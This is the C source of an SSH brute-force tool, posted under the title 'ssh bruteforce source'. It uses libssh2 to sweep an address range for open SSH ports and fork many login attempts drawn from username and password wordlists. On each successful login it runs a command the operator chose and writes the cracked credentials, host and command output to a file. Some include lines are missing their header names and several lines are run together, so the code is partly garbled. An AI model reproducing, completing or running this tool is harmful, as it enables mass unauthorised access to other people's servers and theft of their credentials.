ssh bruteforce source

1.     #define LIBSSH2_STATIC 1
2.     #include "libssh2_config.h"
3.     #include #ifdef HAVE_WINSOCK2_H
4.     # include
5.     #endif
6.     #ifdef HAVE_SYS_SOCKET_H
7.     # include <sys/socket.h>
8.     #endif
9.     #ifdef HAVE_NETINET_IN_H
10.     # include <netinet/in.h>
11.     #endif
12.     #ifdef HAVE_SYS_SELECT_H
13.     # include <sys/select.h>
14.     #endif
15.     # ifdef HAVE_UNISTD_H
16.     #include
17.     #endif
18.     #ifdef HAVE_ARPA_INET_H
19.     # include <arpa/inet.h>
20.     #endif
21.     #include <sys/time.h>
22.     #include <sys/types.h>
23.     #include
24.     #include
25.     #include
26.     #include
27.     #include
28.     #include
29.     #include
30.     #include
31.     #include <sys/wait.h>
32.     #include
33.     #define ALB "\033[1;37m"
34.     #define ALB2 "\033[5;37m"
35.     #define NORM "\033[00;00m"
36.     #define BOLD "\033[00;01m"
37.     #define ROSU "\033[01;31m"
38.     #define GALBE "\033[01;33m"
39.     #define VERDE "\033[01;32m"
40.     #define ALBASTRU "\033[01;34m"
41.     #define FAKE "./jahid"
42.     #define COMPUTATIONS 3000
43.     #define TOTAL_VAL_COUNT 254
44.     #define MAX_SOCKETS 1000
45.     #define TIMEOUT 3
46.     #define S_NONE 0
47.     #define S_CONNECTING 1
48.     #define TABLELEN 63
49.     #define BUFFFERLEN 128
50.     #define ENCODERLEN 4
51.     #define ENCODEROPLEN 0
52.     #define ENCODERBLOCKLEN 3
53.     #define PADDINGCHAR '='
54.     #define BASE64CHARSET "ABCDEFGHIJKLMNOPQRSTUVWXYZ"\
55.     "abcdefghijklmnopqrstuvwxyz"\
56.     "0123456789"\
57.     "+/";
58.     #define _FILE_OFFSET_BITS 64
59.     #define EOL '\n'
60.     #define CAR_RETURN '\r'
61.     #define SUCCESS 0
62.     #define FAILURE -1
63.     struct conn_t {
64.     int s;
65.     char status;
66.     time_t a;
67.     struct sockaddr_in addr;
68.     };
69.     struct conn_t connlist[MAX_SOCKETS];
70.     void init_sockets(void);
71.     void check_sockets(void);
72.     void fatal(char *);
73.     FILE *outfd;
74.     int tot = 0;
75.     int flag,where;
76.     int numforks,maxf;
77.     unsigned char denominator = TOTAL_VAL_COUNT+1;
78.     char *replace_str(char *str, char *orig, char *rep)
79.     {
80.     static char buffer[4096];
81.     char *p;
82.     if(!(p = strstr(str, orig)))
83.     return str;
84.     strncpy(buffer, str, p-str);
85.     buffer[p-str] = '\0';
86.     sprintf(buffer+(p-str), "%s%s", rep, p+strlen(orig));
87.     return buffer;
88.     }
89.     void init_sockets(void)
90.     {
91.     int i;
92.     for (i = 0; i < MAX_SOCKETS; i++)
93.     {
94.     connlist[i].status = S_NONE;
95.     memset((struct sockaddr_in *)&connlist[i].addr, 0, sizeof(struct sockaddr_in));
96.     }
97.     return;
98.     }
99.     void check_sockets(void)
100.     {
101.     int i, ret;
102.     for (i = 0; i < MAX_SOCKETS; i++)
103.     {
104.     if ((connlist[i].a < (time(0) - TIMEOUT)) && (connlist[i].status == S_CONNECTING))
105.     {
106.     close(connlist[i].s);
107.     connlist[i].status = S_NONE;
108.     }
109.     else if (connlist[i].status == S_CONNECTING)
110.     {
111.     ret = connect(connlist[i].s, (struct sockaddr *)&connlist[i].addr,
112.     sizeof(struct sockaddr_in));
113.     if (ret == -1)
114.     {
115.     if (errno == EISCONN)
116.     {
117.     tot++;
118.     fprintf(outfd, "%s\n",
119.     (char *)inet_ntoa(connlist[i].addr.sin_addr));
120.     close(connlist[i].s);
121.     connlist[i].status = S_NONE;
122.     }
123.     if ((errno != EALREADY) && (errno != EINPROGRESS))
124.     {
125.     close(connlist[i].s);
126.     connlist[i].status = S_NONE;
127.     }
128.     }
129.     else
130.     {
131.     tot++;
132.     fprintf(outfd, "%s\n",
133.     (char *)inet_ntoa(connlist[i].addr.sin_addr));
134.     close(connlist[i].s);
135.     connlist[i].status = S_NONE;
136.     }
137.     }
138.     }
139.     }
140.     void fatal(char *err)
141.     {
142.     int i;
143.     printf("Error: %s\n", err);
144.     for (i = 0; i < MAX_SOCKETS; i++) if (connlist[i].status >= S_CONNECTING)
145.     close(connlist[i].s);
146.     fclose(outfd);
147.     exit(EXIT_FAILURE);
148.     }
149.     static int waitsocket(int socket_fd, LIBSSH2_SESSION *session)
150.     {
151.     struct timeval timeout;
152.     int rc;
153.     fd_set fd;
154.     fd_set *writefd = NULL;
155.     fd_set *readfd = NULL;
156.     int dir;
157.     timeout.tv_sec = 2;
158.     timeout.tv_usec = 0;
159.     FD_ZERO(&fd);
160.     FD_SET(socket_fd, &fd);
161.     dir = libssh2_session_block_directions(session);
162.     if(dir & LIBSSH2_SESSION_BLOCK_INBOUND)
163.     readfd = &fd;
164.     if(dir & LIBSSH2_SESSION_BLOCK_OUTBOUND)
165.     writefd = &fd;
166.     rc = select(socket_fd + 1, readfd, writefd, NULL, &timeout);
167.     return rc;
168.     }
169.     int checkauth(char *username,char *password,char *hostname, char *portar, char *command)
170.     {
171.     const char *commandline = command;
172.     FILE *vulnf,*nolog;
173.     unsigned long hostaddr;
174.     int sock, port;
175.     struct sockaddr_in sin;
176.     const char *fingerprint;
177.     LIBSSH2_SESSION *session;
178.     LIBSSH2_CHANNEL *channel;
179.     int rc;
180.     int exitcode;
181.     char *exitsignal=(char *)"none";
182.     int bytecount = 0;
183.     size_t len;
184.     int type, var;
185.     struct timeval timeout;
186.     timeout.tv_sec = 10;
187.     timeout.tv_usec = 0;
188.     port=atoi(portar);
189.     rc = libssh2_init (0);
190.     if (rc != 0) {
191.     fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
192.     return 1;
193.     }
194.     hostaddr = inet_addr(hostname);
195.     sock = socket(AF_INET, SOCK_STREAM, 0);
196.     sin.sin_family = AF_INET;
197.     sin.sin_port = htons(port);
198.     sin.sin_addr.s_addr = hostaddr;
199.     if (setsockopt (sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&timeout,
200.     sizeof(timeout)) < 0)
201.     error("setsockopt failed\n");
202.     if (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *)&timeout,
203.     sizeof(timeout)) < 0) error("setsockopt failed\n"); if (connect(sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) { return -1; } session = libssh2_session_init(); while ((rc = libssh2_session_handshake(session, sock)) == LIBSSH2_ERROR_EAGAIN); if (rc) { return -1; } while ((rc = libssh2_userauth_password(session, username, password)) == LIBSSH2_ERROR_EAGAIN); if (rc) { goto shutdown; } while( (channel = libssh2_channel_open_session(session)) == NULL && libssh2_session_last_error(session,NULL,NULL,0) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( channel == NULL ) { goto shutdown; } while( (rc = libssh2_channel_exec(channel, commandline)) == LIBSSH2_ERROR_EAGAIN ) { waitsocket(sock, session); } if( rc != 0 ) { goto shutdown; } for( ;; ) { int rc; do { char buffer[65535]; rc = libssh2_channel_read( channel, buffer, sizeof(buffer) ); if( rc > 0 )
204.     {
205.     int i;
206.     bytecount += rc;
207.     hostname = strtok (hostname, "\n");
208.     fprintf(stderr, "[*] WOW : %s:%s %s port: %s \n", username,password,hostname, portar);
209.     fprintf(stderr, "[*] Kernel: %s \n", buffer);
210.     vulnf=fopen("sparte.txt","a+");
211.     fprintf(vulnf,"%s:%s %s port: %s --> %s \n",username,password,hostname,portar, buffer);
212.     fclose(vulnf);
213.     goto shutdown;
214.     for( i=0; i < rc; ++i ) var = i; } else { if( rc != LIBSSH2_ERROR_EAGAIN ) goto shutdown; } } while( rc > 0 );
215.     if( rc == LIBSSH2_ERROR_EAGAIN )
216.     {
217.     waitsocket(sock, session);
218.     }
219.     else
220.     break;
221.     }
222.     exitcode = 127;
223.     while( (rc = libssh2_channel_close(channel)) == LIBSSH2_ERROR_EAGAIN )
224.     waitsocket(sock, session);
225.     if( rc == 0 )
226.     {
227.     exitcode = libssh2_channel_get_exit_status( channel );
228.     libssh2_channel_get_exit_signal(channel, &exitsignal,
229.     NULL, NULL, NULL, NULL, NULL);
230.     }
231.     if (exitsignal)
232.     var = var;
233.     else
234.     var = var;
235.     libssh2_channel_free(channel);
236.     close(sock);
237.     channel = NULL;
238.     libssh2_session_disconnect(session,
239.     "Normal Shutdown, Thank you for playing");
240.     libssh2_session_free(session);
241.     libssh2_exit();
242.     exit(0);
243.     shutdown:
244.     libssh2_session_disconnect(session,
245.     "Normal Shutdown, Thank you for playing");
246.     libssh2_session_free(session);
247.     #ifdef WIN32
248.     closesocket(sock);
249.     #else
250.     close(sock);
251.     #endif
252.     var = var;
253.     libssh2_exit();
254.     return 0;
255.     }
256.     int scanbclass(char *bclass, char *port)
257.     {
258.     int done = 0, i, cip = 1, bb = 0, ret, k, ns, x;
259.     time_t scantime;
260.     char ip[20], outfile[128], last[256];
261.     int unlink(const char *pathname);
262.     errno = 0;
263.     if(unlink("scan.log"))
264.     {
265.     printf("\n unlink() failed - [%s]\n",strerror(errno));
266.     }
267.     memset(&outfile, 0, sizeof(outfile));
268.     snprintf(outfile, sizeof(outfile) - 1, "scan.log", bclass, port);
269.     if (!(outfd = fopen(outfile, "a")))
270.     {
271.     perror(outfile);
272.     exit(EXIT_FAILURE);
273.     }
274.     printf("[-] Searching: ", bclass);
275.     fflush(stdout);
276.     memset(&last, 0, sizeof(last));
277.     init_sockets();
278.     scantime = time(0);
279.     while(!done)
280.     {
281.     for (i = 0; i < MAX_SOCKETS; i++)
282.     {
283.     if (cip == 255)
284.     {
285.     if (bb == 255)
286.     {
287.     ns = 0;
288.     for (k = 0; k < MAX_SOCKETS; k++) { if (connlist[k].status > S_NONE)
289.     {
290.     ns++;
291.     break;
292.     }
293.     }
294.     if (ns == 0)
295.     done = 1;
296.     break;
297.     }
298.     else
299.     {
300.     cip = 0;
301.     bb++;
302.     for (x = 0; x < strlen(last); x++)
303.     putchar('\b');
304.     memset(&last, 0, sizeof(last));
305.     snprintf(last, sizeof(last) - 1, "%s.%d.* on port: %s [Found: %d] [%.1f%% Done]",
306.     bclass, bb, port, tot, (bb / 255.0) * 100);
307.     printf("%s", last);
308.     fflush(stdout);
309.     }
310.     }
311.     if (connlist[i].status == S_NONE)
312.     {
313.     connlist[i].s = socket(AF_INET, SOCK_STREAM, 0);
314.     if (connlist[i].s == -1)
315.     printf("Unable to allocate socket.\n");
316.     else
317.     {
318.     ret = fcntl(connlist[i].s, F_SETFL, O_NONBLOCK);
319.     if (ret == -1)
320.     {
321.     printf("Unable to set O_NONBLOCK\n");
322.     close(connlist[i].s);
323.     }
324.     else
325.     {
326.     memset(&ip, 0, 20);
327.     sprintf(ip, "%s.%d.%d", bclass, bb, cip);
328.     connlist[i].addr.sin_addr.s_addr = inet_addr(ip);
329.     if (connlist[i].addr.sin_addr.s_addr == -1)
330.     fatal("Invalid IP.");
331.     connlist[i].addr.sin_family = AF_INET;
332.     connlist[i].addr.sin_port = htons(atoi(port));
333.     connlist[i].a = time(0);
334.     connlist[i].status = S_CONNECTING;
335.     cip++;
336.     }
337.     }
338.     }
339.     }
340.     check_sockets();
341.     }
342.     printf("\n[!] Scanning complete In %u Seconds. [We got %d ips]\n", (time(0) - scantime), tot);
343.     fclose(outfd);
344.     return 1;
345.     }
346.     int line_count(char* __str_file_name) {
347.     FILE* fd;
348.     int ch;
349.     if ((fd = fopen(__str_file_name, "r")) == NULL) {
350.     printf("[Error] : While opening the file\n");
351.     exit(0);
352.     }
353.     unsigned int line_count = 0;
354.     while ( (ch = fgetc(fd)) != EOF)
355.     if (ch == EOL || ch == CAR_RETURN)
356.     ++line_count;
357.     if (fd) {
358.     fclose(fd);
359.     }
360.     return line_count;
361.     }
362.     int scan(char *app, char *thr, char *ipfile, char *userfile, char *passfile, char *portar, char *commandline)
363.     {
364.     int numforks, maxf, status;
365.     FILE *fp,*passf, *userf;
366.     char buff[4096];
367.     char nutt2[4096];
368.     char nutt[4096];
369.     char *pass, *user;
370.     malloc(sizeof(nutt));
371.     malloc(sizeof(nutt2));
372.     malloc(sizeof(buff));
373.     pid_t PID;
374.     char *ns = NULL;
375.     maxf=atoi(thr);
376.     if((userf=fopen(userfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", userfile));
377.     while (fgets(nutt2,sizeof(nutt2),userf)){
378.     user = strdup (nutt2);
379.     user = strtok (user, "\n");
380.     if((passf=fopen(passfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s \n", passfile));
381.     while (fgets(nutt,sizeof(nutt),passf)) {
382.     pass = strdup (nutt);
383.     pass = strtok (pass, "\n");
384.     ns = replace_str(pass, "$user", user);
385.     printf("[*] Trying: %s:%s on found ips\n",user,ns);
386.     if((fp=fopen(ipfile,"r"))==NULL) exit(printf("FATAL: Cannot open %s", ipfile));
387.     while(fgets(buff,sizeof(buff),fp))
388.     {
389.     PID = fork();
390.     if (PID < 0) { fprintf(stderr, "[!] Couldn't fork!\n"); exit(1); } if (( PID == 0 )){ checkauth(user,ns,buff, portar, commandline); //printf("[*] Trying: %s:%s %s:%s Protocol:%s\n",user,ns, buff,portar,prot); exit(0); } else { numforks++; if (numforks > maxf)
391.     for (numforks; numforks > maxf; numforks--)
392.     PID = wait(&status);
393.     }
394.     }
395.     fclose(fp);
396.     }
397.     fclose(passf);
398.     }
399.     fclose(userf);
400.     exit(0);
401.     }
402.     int main(int argc, char *argv[])
403.     {
404.     int input,i=0;
405.     FILE *fp,*passf, *userf, *scanf;
406.     char encodedoutput[BUFFFERLEN + 1] = "";
407.     char decodedoutput[BUFFFERLEN + 1] = "";
408.     char *userfile, *passfile, *command, *threads, *scanfile, *bclass, *port, *t2, *prot;
409.     if(strcmp(argv[1],"-f")==0) { input = 1; }
410.     if(strcmp(argv[1],"-r")==0) { input = 2; }
411.     if(strcmp(argv[1],"-R")==0) { input = 3; }
412.     if(strcmp(argv[1],"-b")==0) { input = 4; }
413.     switch ( input ) {
414.     case 1:
415.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } scanfile = argv[2]; if((scanf=fopen(scanfile,"r"))!= NULL){ if (atoi(threads)) { if (atoi(port) > 2) {
416.     if((userf=fopen(userfile,"r"))!=NULL){
417.     if((passf=fopen(passfile,"r"))!=NULL){
418.     if(command != NULL) { scan(argv[0],threads,scanfile,userfile,passfile,port,command);}
419.     else { goto err; }
420.     } else { goto err; }
421.     } else { goto err; }
422.     } else { goto err; }
423.     } else { goto err; }
424.     } else { goto err; }
425.     break;
426.     case 2:
427.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) {
428.     if((userf=fopen(userfile,"r"))!=NULL){
429.     if((passf=fopen(passfile,"r"))!=NULL){
430.     if(command != NULL) {
431.     //genrand(argv[0],threads,userfile,passfile,port,command);
432.     }
433.     else { goto err; }
434.     } else { goto err; }
435.     } else { goto err; }
436.     } else { goto err; }
437.     } else { goto err; }
438.     break;
439.     case 3:
440.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } } if (atoi(threads)) { if (atoi(port) > 2) {
441.     //genrandl(threads, port);
442.     } else { goto err; }
443.     } else { goto err; }
444.     break;
445.     case 4:
446.     for (i = 0; i < argc; i++){ if(strcmp(argv[i],"-p") ==0) { port = argv[i+1]; } if(strcmp(argv[i],"-user")==0) { userfile = argv[i+1]; } if(strcmp(argv[i],"-pass")==0) { passfile = argv[i+1]; } if(strcmp(argv[i],"-t") ==0) { threads = argv[i+1]; } if(strcmp(argv[i],"-c") ==0) { command = argv[i+1]; } } bclass = argv[2]; if (atoi(threads)) { if (atoi(port) > 2) {
447.     if((userf=fopen(userfile,"r"))!=NULL){
448.     if((passf=fopen(passfile,"r"))!=NULL){
449.     if(command != NULL) {
450.     scanbclass(bclass, port);
451.     scan(argv[0],threads,"scan.log",userfile,passfile,port, command);
452.     }
453.     else { goto err; }
454.     } else { goto err; }
455.     } else { goto err; }
456.     } else { goto err; }
457.     } else { goto err; }
458.     break;
459.     default:
460.     printf( "Bad command, quitting!\n" );
461.     exit (0);
462.     break;
463.     }
464.     getchar();
465.     exit (0);
466.     err:
467.     exit (-1);
468.     }